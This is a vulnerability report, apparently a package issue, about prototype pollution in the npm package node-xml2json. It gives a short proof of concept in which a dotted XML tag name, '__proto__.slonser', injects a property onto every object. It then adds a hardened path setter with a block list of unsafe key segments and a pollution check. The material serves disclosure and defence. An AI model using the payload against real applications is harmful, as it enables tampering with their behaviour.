Hello, I found a vulnerability in your package. The thing is that there is no encoding of the dot symbol, so it is possible to rewrite the prototype of the object.
Steps to reproduce:
- Install your package from npm
- write into a code file something like:
var xml2json = require("node-xml2json");
// Tag name containing a dot: the dot is not encoded, so the name is treated as a nested path
var xml = '<__proto__.slonser>pwned</__proto__>';
var json = xml2json.parser(xml);
// A fresh, unrelated object now inherits the injected property
var a = {};
console.log(a.slonser);
- Result: pwned
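The defensive counterpart to the report above, as an added example that is not part of the original issue or of node-xml2json: a hardened dotted-path setter of the kind a parser needs when it maps tag names such as `a.b` onto nested keys. The function names (`safeSetPath`, `prototypeIsPolluted`, `demo`) and the sample payload are assumptions constructed for this illustration. It refuses the segments that reach the prototype chain (`__proto__`, `constructor`, `prototype`), descends only into own properties, and builds intermediate containers with `Object.create(null)` so there is no prototype to walk onto in the first place.

```javascript
// Added example, not code from node-xml2json. Shows how a parser that turns
// dotted tag names into nested keys can be hardened against prototype pollution.

// Key segments that would let a path escape onto the prototype chain.
const FORBIDDEN_SEGMENTS = new Set(["__proto__", "constructor", "prototype"]);

// Assign `value` at the dotted `path` inside `target`, refusing unsafe segments.
function safeSetPath(target, path, value) {
  const segments = path.split(".");
  for (const seg of segments) {
    if (seg === "" || FORBIDDEN_SEGMENTS.has(seg)) {
      throw new Error(`rejected unsafe key segment: ${JSON.stringify(seg)}`);
    }
  }
  let cur = target;
  for (let i = 0; i < segments.length - 1; i++) {
    const seg = segments[i];
    // Descend only into properties the object itself owns, never inherited ones;
    // create intermediate containers without a prototype.
    const own = Object.prototype.hasOwnProperty.call(cur, seg);
    if (!own || typeof cur[seg] !== "object" || cur[seg] === null) {
      cur[seg] = Object.create(null);
    }
    cur = cur[seg];
  }
  cur[segments[segments.length - 1]] = value;
  return target;
}

// Defender-side check: did Object.prototype acquire a property of this name?
function prototypeIsPolluted(name) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, name);
}

// Runs a benign path and the report's payload (constructed here) through the setter.
function demo() {
  const out = Object.create(null);
  safeSetPath(out, "config.timeout", 30);
  let rejected = false;
  try {
    safeSetPath(out, "__proto__.slonser", "pwned"); // constructed payload from the report
  } catch (e) {
    rejected = true;
  }
  return {
    timeout: out.config.timeout,
    rejected,
    polluted: prototypeIsPolluted("slonser"),
    inherited: ({}).slonser, // undefined when the prototype is intact
  };
}

console.log(demo());
```

Rejecting the segment outright, rather than silently skipping it, also gives the application a clear signal to log: a tag name of `__proto__` in inbound XML is worth an alert, not a quiet drop.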